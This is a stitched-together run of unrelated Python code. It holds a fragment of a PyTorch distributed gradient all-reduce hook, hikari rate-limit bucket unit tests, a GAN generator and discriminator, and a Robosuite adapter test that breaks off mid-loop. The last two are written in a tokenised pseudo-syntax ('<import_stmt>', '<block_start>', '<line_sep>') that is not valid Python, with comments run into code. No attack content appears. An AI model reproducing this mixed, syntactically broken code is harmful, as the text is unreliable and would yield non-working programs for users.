                        buffer[offset:offset + sz].copy_(p.grad.data.view(-1))
                        nonzero_buffer = True
                    else:
                        buffer[offset:offset + sz].zero_()
                    offset += sz
            else:
                # we only have a single grad to all-reduce
                p = params[0]
                if p.grad is not None:
                    buffer = p.grad.data
                    nonzero_buffer = True
                elif p.numel() <= self.buffer.numel():
                    buffer = buffer[:p.numel()]
                    buffer.zero_()
                else:
                    buffer = torch.zeros_like(p)

            if nonzero_buffer:
                buffer.div_(self.world_size)

            distributed_utils.all_reduce(buffer, self.process_group)

            # copy all-reduced grads back into their original place
            offset = 0
            for p in params:
                sz = p.numel()
                if p.grad is not None:
                    p.grad.data.copy_(buffer[offset:offset + sz].view_as(p))
                else:
                    p.grad = buffer[offset:offset + sz].view_as(p).clone()
                offset += sz

        def reduction_fn():
            # This function only needs to be called once
            if not self.need_reduction or self.accumulate_grads:
                return
            self.need_reduction = False

            if self.buffer is None:
                self.buffer = next(self.module.parameters()).new(self.buffer_size)

            # All-reduce the gradients in buckets
            offset = 0
            buffered_params = []
            for param in self.module.parameters():
                if not param.requires_grad:
                    continue
                if param.grad is None:
                    param.grad = torch.zeros_like(param)
                if param.grad.requires_grad:
                    raise RuntimeError("DistributedDataParallel only works "
                                       "with gradients that don't require "
                                       "grad")
                sz = param.numel()
                if sz > self.buffer.numel():
                    # all-reduce big params directly
                    all_reduce([param])
                else:
                    if offset + sz > self.buffer.numel():
                        # bucket is full: flush it before adding this param
                        all_reduce(buffered_params)
                        offset = 0
                        buffered_params.clear()
                    buffered_params.append(param)
                    offset += sz

            if len(buffered_params) > 0:
                all_reduce(buffered_params)

        # Now register the reduction hook on the parameters
        for p in self.module.parameters():

            def allreduce_hook(*unused):
                self.need_reduction = True
                Variable._execution_engine.queue_callback(reduction_fn)

            if p.requires_grad:
                p.register_hook(allreduce_hook)
# -*- coding: utf-8 -*- # Copyright (c) 2020 Nekokatt # Copyright (c) 2021 davfsa # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
import asyncio
import time

import mock
import pytest

from hikari import errors
from hikari.impl import buckets
from hikari.impl import rate_limits
from hikari.internal import routes
from hikari.internal import time as hikari_date
from tests.hikari import hikari_test_helpers


class TestRESTBucket:
    """Unit tests for the per-route RESTBucket rate-limiter."""

    @pytest.fixture()
    def template(self):
        return routes.Route("GET", "/foo/bar")

    @pytest.fixture()
    def compiled_route(self, template):
        return routes.CompiledRoute("/foo/bar", template, "1a2b3c")

    @pytest.mark.asyncio()
    async def test_async_context_manager(self, compiled_route):
        with mock.patch.object(asyncio, "Lock") as lock:
            lock.return_value.acquire = mock.AsyncMock()
            with mock.patch.object(buckets.RESTBucket, "acquire", new=mock.AsyncMock()) as acquire:
                async with buckets.RESTBucket("spaghetti", compiled_route, float("inf")):
                    acquire.assert_awaited_once_with()
                    lock.return_value.release.assert_not_called()

                lock.return_value.release.assert_called_once_with()

    @pytest.mark.parametrize("name", ["spaghetti", buckets.UNKNOWN_HASH])
    def test_is_unknown(self, name, compiled_route):
        with buckets.RESTBucket(name, compiled_route, float("inf")) as rl:
            assert rl.is_unknown is (name == buckets.UNKNOWN_HASH)

    def test_update_rate_limit(self, compiled_route):
        with buckets.RESTBucket(__name__, compiled_route, float("inf")) as rl:
            rl.remaining = 1
            rl.limit = 2
            rl.reset_at = 3
            rl.period = 2

            with mock.patch.object(hikari_date, "monotonic", return_value=4.20):
                rl.update_rate_limit(9, 18, 27)

            assert rl.remaining == 9
            assert rl.limit == 18
            assert rl.reset_at == 27
            assert rl.period == 27 - 4.20

    @pytest.mark.parametrize("name", ["spaghetti", buckets.UNKNOWN_HASH])
    def test_drip(self, name, compiled_route):
        with buckets.RESTBucket(name, compiled_route, float("inf")) as rl:
            rl.remaining = 1
            rl.drip()

            assert rl.remaining == 0 if name != buckets.UNKNOWN_HASH else 1

    @pytest.mark.asyncio()
    async def test_acquire_when_unknown_bucket(self, compiled_route):
        with buckets.RESTBucket(buckets.UNKNOWN_HASH, compiled_route, float("inf")) as rl:
            rl._lock = mock.AsyncMock()
            with mock.patch.object(rate_limits.WindowedBurstRateLimiter, "acquire") as super_acquire:
                assert await rl.acquire() is None

            rl._lock.acquire.assert_awaited_once_with()
            super_acquire.assert_not_called()

    @pytest.mark.asyncio()
    async def test_acquire_when_too_long_ratelimit(self, compiled_route):
        with buckets.RESTBucket("spaghetti", compiled_route, 60) as rl:
            rl.reset_at = time.perf_counter() + 999999999999999999999999999
            with mock.patch.object(buckets.RESTBucket, "is_rate_limited", return_value=True):
                with pytest.raises(errors.RateLimitTooLongError):
                    await rl.acquire()

    @pytest.mark.asyncio()
    async def test_acquire(self, compiled_route):
        with buckets.RESTBucket("spaghetti", compiled_route, float("inf")) as rl:
            rl._lock = mock.AsyncMock()
            with mock.patch.object(rate_limits.WindowedBurstRateLimiter, "acquire") as super_acquire:
                await rl.acquire()

                super_acquire.assert_awaited_once_with()
                rl._lock.acquire.assert_awaited_once_with()

    def test_resolve_when_not_unknown(self, compiled_route):
        with buckets.RESTBucket("spaghetti", compiled_route, float("inf")) as rl:
            with pytest.raises(RuntimeError, match=r"Cannot resolve known bucket"):
                rl.resolve("test")

            assert rl.name == "spaghetti"

    def test_resolve(self, compiled_route):
        with buckets.RESTBucket(buckets.UNKNOWN_HASH, compiled_route, float("inf")) as rl:
            rl.resolve("test")

            assert rl.name == "test"


class TestRESTBucketManager:
    """Unit tests for the bucket manager's GC loop and hash bookkeeping."""

    @pytest.mark.asyncio()
    async def test_close_closes_all_buckets(self):
        class MockBucket:
            def __init__(self):
                self.close = mock.Mock()

        buckets_array = [MockBucket() for _ in range(30)]

        mgr = buckets.RESTBucketManager(max_rate_limit=float("inf"))
        mgr.real_hashes_to_buckets = {f"blah{i}": bucket for i, bucket in enumerate(buckets_array)}

        mgr.close()

        for i, bucket in enumerate(buckets_array):
            bucket.close.assert_called_once(), i

    @pytest.mark.asyncio()
    async def test_close_sets_closed_event(self):
        mgr = buckets.RESTBucketManager(max_rate_limit=float("inf"))
        assert not mgr.closed_event.is_set()

        mgr.close()

        assert mgr.closed_event.is_set()

    @pytest.mark.asyncio()
    async def test_start(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            assert mgr.gc_task is None
            # Starting repeatedly must be idempotent.
            mgr.start()
            mgr.start()
            mgr.start()
            assert mgr.gc_task is not None

    @pytest.mark.asyncio()
    async def test_exit_closes(self):
        with mock.patch.object(buckets.RESTBucketManager, "close") as close:
            with mock.patch.object(buckets.RESTBucketManager, "gc") as gc:
                with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
                    mgr.start(0.01, 32)
                gc.assert_called_once_with(0.01, 32)
            close.assert_called()

    @pytest.mark.asyncio()
    async def test_gc_polls_until_closed_event_set(self):
        # Crude, but it verifies the polling loop end-to-end.
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            mgr.start(0.01)
            assert mgr.gc_task is not None
            assert not mgr.gc_task.done()
            await hikari_test_helpers.idle()
            assert mgr.gc_task is not None
            assert not mgr.gc_task.done()
            await hikari_test_helpers.idle()
            mgr.closed_event.set()
            assert mgr.gc_task is not None
            assert not mgr.gc_task.done()
            task = mgr.gc_task
            await hikari_test_helpers.idle()
            assert mgr.gc_task is None
            assert task.done()

    @pytest.mark.asyncio()
    async def test_gc_calls_do_pass(self):
        with hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager, slots_=False)(
            max_rate_limit=float("inf")
        ) as mgr:
            mgr.do_gc_pass = mock.Mock()
            mgr.start(0.01, 33)
            try:
                await hikari_test_helpers.idle()
                mgr.do_gc_pass.assert_called_with(33)
            finally:
                mgr.gc_task.cancel()

    @pytest.mark.asyncio()
    async def test_do_gc_pass_any_buckets_that_are_empty_but_still_rate_limited_are_kept_alive(self):
        with hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf")) as mgr:
            bucket = mock.Mock()
            bucket.is_empty = True
            bucket.is_unknown = False
            bucket.reset_at = time.perf_counter() + 999999999999999999999999999

            mgr.real_hashes_to_buckets["foobar"] = bucket

            mgr.do_gc_pass(0)

            assert "foobar" in mgr.real_hashes_to_buckets
            bucket.close.assert_not_called()

    @pytest.mark.asyncio()
    async def test_do_gc_pass_any_buckets_that_are_empty_but_not_rate_limited_and_not_expired_are_kept_alive(self):
        with hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf")) as mgr:
            bucket = mock.Mock()
            bucket.is_empty = True
            bucket.is_unknown = False
            bucket.reset_at = time.perf_counter()

            mgr.real_hashes_to_buckets["foobar"] = bucket

            mgr.do_gc_pass(10)

            assert "foobar" in mgr.real_hashes_to_buckets
            bucket.close.assert_not_called()

    @pytest.mark.asyncio()
    async def test_do_gc_pass_any_buckets_that_are_empty_but_not_rate_limited_and_expired_are_closed(self):
        with hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf")) as mgr:
            bucket = mock.Mock()
            bucket.is_empty = True
            bucket.is_unknown = False
            bucket.reset_at = time.perf_counter() - 999999999999999999999999999

            mgr.real_hashes_to_buckets["foobar"] = bucket

            mgr.do_gc_pass(0)

            assert "foobar" not in mgr.real_hashes_to_buckets
            bucket.close.assert_called_once()

    @pytest.mark.asyncio()
    async def test_do_gc_pass_any_buckets_that_are_not_empty_are_kept_alive(self):
        with hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf")) as mgr:
            bucket = mock.Mock()
            bucket.is_empty = False
            bucket.is_unknown = True
            bucket.reset_at = time.perf_counter()

            mgr.real_hashes_to_buckets["foobar"] = bucket

            mgr.do_gc_pass(0)

            assert "foobar" in mgr.real_hashes_to_buckets
            bucket.close.assert_not_called()

    @pytest.mark.asyncio()
    async def test_acquire_route_when_not_in_routes_to_real_hashes_makes_new_bucket_using_initial_hash(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            with mock.patch.object(buckets, "_create_unknown_hash", return_value="UNKNOWN;bobs") as create_unknown_hash:
                mgr.acquire(route)

            assert "UNKNOWN;bobs" in mgr.real_hashes_to_buckets
            assert isinstance(mgr.real_hashes_to_buckets["UNKNOWN;bobs"], buckets.RESTBucket)
            create_unknown_hash.assert_called_once_with(route)

    @pytest.mark.asyncio()
    async def test_acquire_route_when_not_in_routes_to_real_hashes_doesnt_cache_route(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(wraps=lambda initial_hash: initial_hash + ";bobs")

            mgr.acquire(route)

            assert mgr.routes_to_hashes.get(route.route) is None

    @pytest.mark.asyncio()
    async def test_acquire_route_when_route_cached_already_obtains_hash_from_route_and_bucket_from_hash(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(return_value="eat pant;1234")
            bucket = mock.Mock(reset_at=time.perf_counter() + 999999999999999999999999999)
            mgr.routes_to_hashes[route.route] = "eat pant"
            mgr.real_hashes_to_buckets["eat pant;1234"] = bucket

            assert mgr.acquire(route) is bucket

    @pytest.mark.asyncio()
    async def test_acquire_route_returns_context_manager(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()

            bucket = mock.Mock(reset_at=time.perf_counter() + 999999999999999999999999999)
            with mock.patch.object(buckets, "RESTBucket", return_value=bucket):
                route.create_real_bucket_hash = mock.Mock(wraps=lambda initial_hash: initial_hash + ";bobs")

                assert mgr.acquire(route) is bucket

    @pytest.mark.asyncio()
    async def test_acquire_unknown_route_returns_context_manager_for_new_bucket(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(return_value="eat pant;bobs")
            bucket = mock.Mock(reset_at=time.perf_counter() + 999999999999999999999999999)
            mgr.routes_to_hashes[route.route] = "eat pant"
            mgr.real_hashes_to_buckets["eat pant;bobs"] = bucket

            assert mgr.acquire(route) is bucket

    @pytest.mark.asyncio()
    async def test_update_rate_limits_if_wrong_bucket_hash_reroutes_route(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(wraps=lambda initial_hash: initial_hash + ";bobs")
            mgr.routes_to_hashes[route.route] = "123"
            with mock.patch.object(hikari_date, "monotonic", return_value=27):
                with mock.patch.object(buckets, "RESTBucket") as bucket:
                    mgr.update_rate_limits(route, "blep", 22, 23, 3.56)

            assert mgr.routes_to_hashes[route.route] == "blep"
            assert mgr.real_hashes_to_buckets["blep;bobs"] is bucket.return_value
            bucket.return_value.update_rate_limit.assert_called_once_with(22, 23, 27 + 3.56)

    @pytest.mark.asyncio()
    async def test_update_rate_limits_if_unknown_bucket_hash_reroutes_route(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(wraps=lambda initial_hash: initial_hash + ";bobs")
            mgr.routes_to_hashes[route.route] = "123"
            bucket = mock.Mock()
            mgr.real_hashes_to_buckets["UNKNOWN;bobs"] = bucket
            with mock.patch.object(buckets, "_create_unknown_hash", return_value="UNKNOWN;bobs") as create_unknown_hash:
                with mock.patch.object(hikari_date, "monotonic", return_value=27):
                    mgr.update_rate_limits(route, "blep", 22, 23, 3.56)

            assert mgr.routes_to_hashes[route.route] == "blep"
            assert mgr.real_hashes_to_buckets["blep;bobs"] is bucket
            bucket.resolve.assert_called_once_with("blep;bobs")
            bucket.update_rate_limit.assert_called_once_with(22, 23, 27 + 3.56)
            create_unknown_hash.assert_called_once_with(route)

    @pytest.mark.asyncio()
    async def test_update_rate_limits_if_right_bucket_hash_does_nothing_to_hash(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(wraps=lambda initial_hash: initial_hash + ";bobs")
            mgr.routes_to_hashes[route.route] = "123"
            bucket = mock.Mock(reset_at=time.perf_counter() + 999999999999999999999999999)
            mgr.real_hashes_to_buckets["123;bobs"] = bucket
            with mock.patch.object(hikari_date, "monotonic", return_value=27):
                mgr.update_rate_limits(route, "123", 22, 23, 7.65)

            assert mgr.routes_to_hashes[route.route] == "123"
            assert mgr.real_hashes_to_buckets["123;bobs"] is bucket
            bucket.update_rate_limit.assert_called_once_with(22, 23, 27 + 7.65)

    @pytest.mark.asyncio()
    async def test_update_rate_limits_updates_params(self):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            route = mock.Mock()
            route.create_real_bucket_hash = mock.Mock(wraps=lambda initial_hash: initial_hash + ";bobs")
            mgr.routes_to_hashes[route.route] = "123"
            bucket = mock.Mock(reset_at=time.perf_counter() + 999999999999999999999999999)
            mgr.real_hashes_to_buckets["123;bobs"] = bucket

            with mock.patch.object(hikari_date, "monotonic", return_value=27):
                mgr.update_rate_limits(route, "123", 22, 23, 5.32)

                bucket.update_rate_limit.assert_called_once_with(22, 23, 27 + 5.32)

    @pytest.mark.parametrize(("gc_task", "is_started"), [(None, False), (mock.Mock(spec_set=asyncio.Task), True)])
    def test_is_started(self, gc_task, is_started):
        with buckets.RESTBucketManager(max_rate_limit=float("inf")) as mgr:
            mgr.gc_task = gc_task

            assert mgr.is_started is is_started
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>torch.nn.parameter Parameter<class_stmt>ResnetGenerator(nn.Module)<block_start><def_stmt>__init__ self input_nc output_nc ngf=64 n_blocks=6 img_size=256 light=<false><block_start><assert_stmt>(n_blocks<ge>0)<line_sep>super(ResnetGenerator self).__init__()<line_sep>self.input_nc=input_nc<line_sep>self.output_nc=output_nc<line_sep>self.ngf=ngf<line_sep>self.n_blocks=n_blocks<line_sep>self.img_size=img_size<line_sep>self.light=light<line_sep>DownBlock=[]<line_sep>DownBlock<augadd>[nn.ReflectionPad2d(3) nn.Conv2d(input_nc ngf kernel_size=7 stride=1 padding=0 bias=<false>) nn.InstanceNorm2d(ngf) nn.ReLU(<true>)]<line_sep># Down-Sampling n_downsampling=2<for_stmt>i range(n_downsampling)<block_start>mult=2<power>i<line_sep>DownBlock<augadd>[nn.ReflectionPad2d(1) nn.Conv2d(ngf<times>mult ngf<times>mult<times>2 kernel_size=3 stride=2 padding=0 bias=<false>) nn.InstanceNorm2d(ngf<times>mult<times>2) nn.ReLU(<true>)]<block_end># Down-Sampling Bottleneck mult=2<power>n_downsampling<for_stmt>i range(n_blocks)<block_start>DownBlock<augadd>[ResnetBlock(ngf<times>mult use_bias=<false>)]<block_end># Class Activation Map self.gap_fc=nn.Linear(ngf<times>mult 1 bias=<false>)<line_sep>self.gmp_fc=nn.Linear(ngf<times>mult 1 bias=<false>)<line_sep>self.conv1x1=nn.Conv2d(ngf<times>mult<times>2 ngf<times>mult kernel_size=1 stride=1 bias=<true>)<line_sep>self.relu=nn.ReLU(<true>)<line_sep># Gamma, Beta block <if_stmt>self.light<block_start>FC=[nn.Linear(ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>) nn.Linear(ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>)]<block_end><else_stmt><block_start>FC=[nn.Linear(img_size<floordiv>mult<times>img_size<floordiv>mult<times>ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>) nn.Linear(ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>)]<block_end>self.gamma=nn.Linear(ngf<times>mult ngf<times>mult 
bias=<false>)<line_sep>self.beta=nn.Linear(ngf<times>mult ngf<times>mult bias=<false>)<line_sep># Up-Sampling Bottleneck <for_stmt>i range(n_blocks)<block_start>setattr(self 'UpBlock1_'+str(i+1) ResnetAdaILNBlock(ngf<times>mult use_bias=<false>))<block_end># Up-Sampling UpBlock2=[]<for_stmt>i range(n_downsampling)<block_start>mult=2<power>(n_downsampling-i)<line_sep>UpBlock2<augadd>[nn.Upsample(scale_factor=2 mode='nearest') nn.ReflectionPad2d(1) nn.Conv2d(ngf<times>mult int(ngf<times>mult/2) kernel_size=3 stride=1 padding=0 bias=<false>) ILN(int(ngf<times>mult/2)) nn.ReLU(<true>)]<block_end>UpBlock2<augadd>[nn.ReflectionPad2d(3) nn.Conv2d(ngf output_nc kernel_size=7 stride=1 padding=0 bias=<false>) nn.Tanh()]<line_sep>self.DownBlock=nn.Sequential(*DownBlock)<line_sep>self.FC=nn.Sequential(*FC)<line_sep>self.UpBlock2=nn.Sequential(*UpBlock2)<block_end><def_stmt>forward self input<block_start>x=self.DownBlock(input)<line_sep>gap=torch.nn.functional.adaptive_avg_pool2d(x 1)<line_sep>gap_logit=self.gap_fc(gap.view(x.shape[0] -1))<line_sep>gap_weight=list(self.gap_fc.parameters())[0]<line_sep>gap=x<times>gap_weight.unsqueeze(2).unsqueeze(3)<line_sep>gmp=torch.nn.functional.adaptive_max_pool2d(x 1)<line_sep>gmp_logit=self.gmp_fc(gmp.view(x.shape[0] -1))<line_sep>gmp_weight=list(self.gmp_fc.parameters())[0]<line_sep>gmp=x<times>gmp_weight.unsqueeze(2).unsqueeze(3)<line_sep>cam_logit=torch.cat([gap_logit gmp_logit] 1)<line_sep>x=torch.cat([gap gmp] 1)<line_sep>x=self.relu(self.conv1x1(x))<line_sep>heatmap=torch.sum(x dim=1 keepdim=<true>)<if_stmt>self.light<block_start>x_=torch.nn.functional.adaptive_avg_pool2d(x 1)<line_sep>x_=self.FC(x_.view(x_.shape[0] -1))<block_end><else_stmt><block_start>x_=self.FC(x.view(x.shape[0] -1))<block_end>gamma,beta=self.gamma(x_) self.beta(x_)<for_stmt>i range(self.n_blocks)<block_start>x=getattr(self 'UpBlock1_'+str(i+1))(x gamma beta)<block_end>out=self.UpBlock2(x)<line_sep><return>out cam_logit 
heatmap<block_end><block_end><class_stmt>ResnetBlock(nn.Module)<block_start><def_stmt>__init__ self dim use_bias<block_start>super(ResnetBlock self).__init__()<line_sep>conv_block=[]<line_sep>conv_block<augadd>[nn.ReflectionPad2d(1) nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias) nn.InstanceNorm2d(dim) nn.ReLU(<true>)]<line_sep>conv_block<augadd>[nn.ReflectionPad2d(1) nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias) nn.InstanceNorm2d(dim)]<line_sep>self.conv_block=nn.Sequential(*conv_block)<block_end><def_stmt>forward self x<block_start>out=x+self.conv_block(x)<line_sep><return>out<block_end><block_end><class_stmt>ResnetAdaILNBlock(nn.Module)<block_start><def_stmt>__init__ self dim use_bias<block_start>super(ResnetAdaILNBlock self).__init__()<line_sep>self.pad1=nn.ReflectionPad2d(1)<line_sep>self.conv1=nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias)<line_sep>self.norm1=adaILN(dim)<line_sep>self.relu1=nn.ReLU(<true>)<line_sep>self.pad2=nn.ReflectionPad2d(1)<line_sep>self.conv2=nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias)<line_sep>self.norm2=adaILN(dim)<block_end><def_stmt>forward self x gamma beta<block_start>out=self.pad1(x)<line_sep>out=self.conv1(out)<line_sep>out=self.norm1(out gamma beta)<line_sep>out=self.relu1(out)<line_sep>out=self.pad2(out)<line_sep>out=self.conv2(out)<line_sep>out=self.norm2(out gamma beta)<line_sep><return>out+x<block_end><block_end><class_stmt>adaILN(nn.Module)<block_start><def_stmt>__init__ self num_features eps=1e-5<block_start>super(adaILN self).__init__()<line_sep>self.eps=eps<line_sep>self.rho=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.rho.data.fill_(0.9)<block_end><def_stmt>forward self input gamma beta<block_start>in_mean,in_var=torch.mean(input dim=[2 3] keepdim=<true>) torch.var(input dim=[2 3] keepdim=<true>)<line_sep>out_in=(input-in_mean)/torch.sqrt(in_var+self.eps)<line_sep>ln_mean,ln_var=torch.mean(input dim=[1 2 3] keepdim=<true>) 
torch.var(input dim=[1 2 3] keepdim=<true>)<line_sep>out_ln=(input-ln_mean)/torch.sqrt(ln_var+self.eps)<line_sep>out=self.rho.expand(input.shape[0] -1 -1 -1)<times>out_in+(1-self.rho.expand(input.shape[0] -1 -1 -1))<times>out_ln<line_sep>out=out<times>gamma.unsqueeze(2).unsqueeze(3)+beta.unsqueeze(2).unsqueeze(3)<line_sep><return>out<block_end><block_end><class_stmt>ILN(nn.Module)<block_start><def_stmt>__init__ self num_features eps=1e-5<block_start>super(ILN self).__init__()<line_sep>self.eps=eps<line_sep>self.rho=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.gamma=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.beta=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.rho.data.fill_(0.0)<line_sep>self.gamma.data.fill_(1.0)<line_sep>self.beta.data.fill_(0.0)<block_end><def_stmt>forward self input<block_start>in_mean,in_var=torch.mean(input dim=[2 3] keepdim=<true>) torch.var(input dim=[2 3] keepdim=<true>)<line_sep>out_in=(input-in_mean)/torch.sqrt(in_var+self.eps)<line_sep>ln_mean,ln_var=torch.mean(input dim=[1 2 3] keepdim=<true>) torch.var(input dim=[1 2 3] keepdim=<true>)<line_sep>out_ln=(input-ln_mean)/torch.sqrt(ln_var+self.eps)<line_sep>out=self.rho.expand(input.shape[0] -1 -1 -1)<times>out_in+(1-self.rho.expand(input.shape[0] -1 -1 -1))<times>out_ln<line_sep>out=out<times>self.gamma.expand(input.shape[0] -1 -1 -1)+self.beta.expand(input.shape[0] -1 -1 -1)<line_sep><return>out<block_end><block_end><class_stmt>Discriminator(nn.Module)<block_start><def_stmt>__init__ self input_nc ndf=64 n_layers=5<block_start>super(Discriminator self).__init__()<line_sep>model=[nn.ReflectionPad2d(1) nn.utils.spectral_norm(nn.Conv2d(input_nc ndf kernel_size=4 stride=2 padding=0 bias=<true>)) nn.LeakyReLU(0.2 <true>)]<for_stmt>i range(1 n_layers-2)<block_start>mult=2<power>(i-1)<line_sep>model<augadd>[nn.ReflectionPad2d(1) nn.utils.spectral_norm(nn.Conv2d(ndf<times>mult ndf<times>mult<times>2 kernel_size=4 stride=2 padding=0 bias=<true>)) 
nn.LeakyReLU(0.2 <true>)]<block_end>mult=2<power>(n_layers-2-1)<line_sep>model<augadd>[nn.ReflectionPad2d(1) nn.utils.spectral_norm(nn.Conv2d(ndf<times>mult ndf<times>mult<times>2 kernel_size=4 stride=1 padding=0 bias=<true>)) nn.LeakyReLU(0.2 <true>)]<line_sep># Class Activation Map mult=2<power>(n_layers-2)<line_sep>self.gap_fc=nn.utils.spectral_norm(nn.Linear(ndf<times>mult 1 bias=<false>))<line_sep>self.gmp_fc=nn.utils.spectral_norm(nn.Linear(ndf<times>mult 1 bias=<false>))<line_sep>self.conv1x1=nn.Conv2d(ndf<times>mult<times>2 ndf<times>mult kernel_size=1 stride=1 bias=<true>)<line_sep>self.leaky_relu=nn.LeakyReLU(0.2 <true>)<line_sep>self.pad=nn.ReflectionPad2d(1)<line_sep>self.conv=nn.utils.spectral_norm(nn.Conv2d(ndf<times>mult 1 kernel_size=4 stride=1 padding=0 bias=<false>))<line_sep>self.model=nn.Sequential(*model)<block_end><def_stmt>forward self input<block_start>x=self.model(input)<line_sep>gap=torch.nn.functional.adaptive_avg_pool2d(x 1)<line_sep>gap_logit=self.gap_fc(gap.view(x.shape[0] -1))<line_sep>gap_weight=list(self.gap_fc.parameters())[0]<line_sep>gap=x<times>gap_weight.unsqueeze(2).unsqueeze(3)<line_sep>gmp=torch.nn.functional.adaptive_max_pool2d(x 1)<line_sep>gmp_logit=self.gmp_fc(gmp.view(x.shape[0] -1))<line_sep>gmp_weight=list(self.gmp_fc.parameters())[0]<line_sep>gmp=x<times>gmp_weight.unsqueeze(2).unsqueeze(3)<line_sep>cam_logit=torch.cat([gap_logit gmp_logit] 1)<line_sep>x=torch.cat([gap gmp] 1)<line_sep>x=self.leaky_relu(self.conv1x1(x))<line_sep>heatmap=torch.sum(x dim=1 keepdim=<true>)<line_sep>x=self.pad(x)<line_sep>out=self.conv(x)<line_sep><return>out cam_logit heatmap<block_end><block_end><class_stmt>RhoClipper(object)<block_start><def_stmt>__init__ self min max<block_start>self.clip_min=min<line_sep>self.clip_max=max<assert_stmt>min<l>max<block_end><def_stmt>__call__ self module<block_start><if_stmt>hasattr(module 'rho')<block_start>w=module.rho.data<line_sep>w=w.clamp(self.clip_min 
self.clip_max)<line_sep>module.rho.data=w<block_end><block_end><block_end>
<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>.softlearning_env_test AdapterTestClass<import_from_stmt>softlearning.environments.adapters.robosuite_adapter RobosuiteAdapter <class_stmt>TestRobosuiteAdapter(unittest.TestCase AdapterTestClass)# TODO(hartikainen): This is a terrible way of testing the envs. # All the envs should be tested independently. <block_start><def_stmt>create_adapter self domain='Sawyer' task='Lift' *args **kwargs<block_start><return>RobosuiteAdapter(domain task *args **kwargs has_renderer=<false> has_offscreen_renderer=<false> use_camera_obs=<false>)<block_end><def_stmt>test_environments self# Make sure that all the environments are creatable <block_start>TEST_ENVIRONMENTS=[('Sawyer' 'Lift')]<def_stmt>verify_reset_and_step domain task<block_start>env=RobosuiteAdapter(domain=domain task=task has_renderer=<false> has_offscreen_renderer=<false> use_camera_obs=<false>)<line_sep>env.reset()<line_sep>env.step(env.action_space.sample())<block_end><for_stmt>domain,task TEST_ENVIRONMENTS<block_start>verify_reset_and_step(domain task)<block_end><block_end><def_stmt>test_copy_environments self<block_start>domain,task='Sawyer' 'Lift'<line_sep>env_kwargs={"gripper_type":"TwoFingerGripper" "table_full_size":(0.8 0.8 0.8)}<line_sep>env1=self.create_adapter(domain=domain task=task **env_kwargs)<line_sep>env1.reset()<line_sep>env2=env1.copy()<line_sep>self.assertEqual(env1.observation_keys env2.observation_keys)<for_stmt>key,value env_kwargs.items()<block_start>self.assertEqual(getattr(env1.unwrapped key) value)<line_sep>self.assertEqual(getattr(env2.unwrapped key) value)<block_end>domain,task='Sawyer' 'Lift'<line_sep>robosuite_adapter_kwargs={'observation_keys':('joint_pos' 'joint_vel')}<line_sep>env_kwargs={"gripper_type":"TwoFingerGripper" "table_full_size":(0.8 0.8 0.8)}<line_sep>env1=self.create_adapter(domain=domain task=task **robosuite_adapter_kwargs **env_kwargs)<line_sep>env1.reset()<line_sep>env2=env1.copy()<for_stmt>key,value 
